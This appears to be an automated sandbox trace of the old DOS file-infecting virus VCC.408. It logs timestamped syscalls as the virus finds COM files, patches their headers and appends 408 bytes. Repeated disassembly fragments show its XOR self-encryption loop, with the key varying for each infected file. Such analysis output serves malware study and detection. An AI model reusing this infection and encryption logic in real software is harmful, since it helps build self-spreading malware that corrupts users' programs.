Sample viewer

vx.netlux.org/Virus.DOS.VCC.408

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:19.458857605Z 26 PC: 12a73 | Set disk transfer address
2018-12-17T22:45:19.460473291Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:45:19.471252249Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:45:19.472691965Z 78 PC: 12ad1 | Find first file
2018-12-17T22:45:19.480051736Z 61 PC: 12b6c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:19.494278256Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:19.501288579Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:45:19.502725585Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:45:19.50517149Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:19.50813085Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:45:19.509531329Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x198], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 6]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x20]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:45:19.512635124Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:45:19.528053891Z 62 PC: 12bce | Close file
2018-12-17T22:45:19.537352708Z 79 PC: 12ad1 | Find next file
2018-12-17T22:45:19.540911872Z 61 PC: 12b6c | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:19.549975812Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:19.557842839Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:45:19.559298908Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:45:19.561163714Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:19.564266414Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:45:19.565886359Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x198], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 6]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x20]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x42
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:45:19.570080197Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:45:19.574374163Z 62 PC: 12bce | Close file
2018-12-17T22:45:19.583107135Z 79 PC: 12ad1 | Find next file
2018-12-17T22:45:19.587948189Z 61 PC: 12b6c | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:19.595097431Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:19.602175438Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:45:19.604016769Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:45:19.606231594Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:19.609606945Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:45:19.611563807Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x198], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 6]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x20]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x48
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:45:19.618959299Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:45:19.622141276Z 62 PC: 12bce | Close file
2018-12-17T22:45:19.631355701Z 79 PC: 12ad1 | Find next file
2018-12-17T22:45:19.638652294Z 61 PC: 12b6c | Open file (Filename = 'PHANG.COM')
2018-12-17T22:45:19.646831338Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:19.65451629Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:45:19.656878433Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:45:19.658501816Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:19.661312027Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:45:19.663466776Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x198], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 6]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x20]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x48
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:45:19.665907092Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:45:19.668972698Z 62 PC: 12bce | Close file
2018-12-17T22:45:19.67851864Z 79 PC: 12ad1 | Find next file
2018-12-17T22:45:19.687519642Z 61 PC: 12b6c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:45:19.694732155Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:19.706651719Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:45:19.709294836Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:45:19.710584886Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:19.713291399Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:45:19.7151364Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x198], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 6]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x20]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x4d
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:45:19.717726418Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:45:19.721103477Z 62 PC: 12bce | Close file
2018-12-17T22:45:19.730964045Z 26 PC: 12aeb | Set disk transfer address
2018-12-17T22:45:19.732686985Z 61 PC: 12b6c | Open file (Filename = '')
2018-12-17T22:45:19.735321777Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 9)
2018-12-17T22:45:19.738583665Z 62 PC: 12bce | Close file